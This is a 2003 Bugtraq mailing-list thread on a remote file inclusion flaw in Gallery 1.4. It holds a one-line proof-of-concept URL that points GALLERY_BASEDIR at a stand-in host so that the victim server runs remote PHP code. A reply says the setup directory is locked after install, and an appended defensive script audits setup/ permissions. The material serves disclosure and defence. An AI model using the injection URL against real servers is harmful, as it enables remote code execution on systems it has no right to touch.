Open Source and information security mailing list archives
 
Date: Sat, 11 Oct 2003 13:41:47 -0500
From: "Brent Meshier" <brent@...hier.com>
To: "'Peter Stöckli'" <pcs@...tquest.com>,
	<bugtraq@...urityfocus.com>
Subject: RE: Gallery 1.4 including file vulnerability


The URL you mention is accessible only during the setup of Gallery.
Completing the installation, the user runs secure.sh or secure.bat which
"chmod 0 setup" making the vulnerability you mention inaccessible to the
web.

Brent Meshier
Global Transport Logistics, Inc.
2770 Fortune Circle Drive
Indianapolis, IN 46241
(317) 481-0527 x23 Direct
(317) 481-0177 Fax
http://www.gtlogistics.com/

-----Original Message-----
From: Peter Stöckli [mailto:pcs@...tquest.com] 
Sent: Saturday, October 11, 2003 11:13 AM
To: bugtraq@...urityfocus.com
Subject: Gallery 1.4 including file vulnerability

-Proof of concept-
It is possible to include any php file from a remote host, and execute
it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included.
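
Added example (not part of either message, and not Gallery's own secure.sh): a shell check that reports whether the setup directory of a Gallery install is at mode 0, the state the reply relies on after secure.sh has run. The function names and the assumption that setup/ sits directly under each directory passed in are illustrative.

```shell
#!/bin/sh
# Added example: audit Gallery installs for a setup/ directory that was never
# locked down with "chmod 0 setup" (the step the reply attributes to secure.sh).
# Assumption: each argument is a Gallery base directory containing setup/.

# Print the octal permission bits of a path (GNU stat first, then BSD stat).
perm_bits() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1" 2>/dev/null
}

# Classify one install: prints "locked", "exposed" or "absent".
setup_state() {
    setup_dir="$1/setup"
    if [ ! -e "$setup_dir" ] && [ ! -L "$setup_dir" ]; then
        echo absent
        return 0
    fi
    # If the mode cannot be read, treat the directory as exposed (fail closed).
    mode=$(perm_bits "$setup_dir") || mode=unknown
    if [ "$mode" = "0" ]; then
        echo locked
    else
        echo exposed
    fi
}

# Report every install given; return 1 if any setup/ is still exposed.
audit_galleries() {
    rc=0
    for dir in "$@"; do
        state=$(setup_state "$dir")
        printf '%s\t%s\n' "$state" "$dir"
        if [ "$state" = exposed ]; then
            rc=1
        fi
    done
    return "$rc"
}

# Stand-alone use: pass one or more Gallery base directories as arguments.
if [ "$#" -gt 0 ]; then
    audit_galleries "$@"
fi
```

The check reads permission bits only; a setup/ directory reported as "exposed" means the installation was left in setup mode or was put back into it for reconfiguration.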


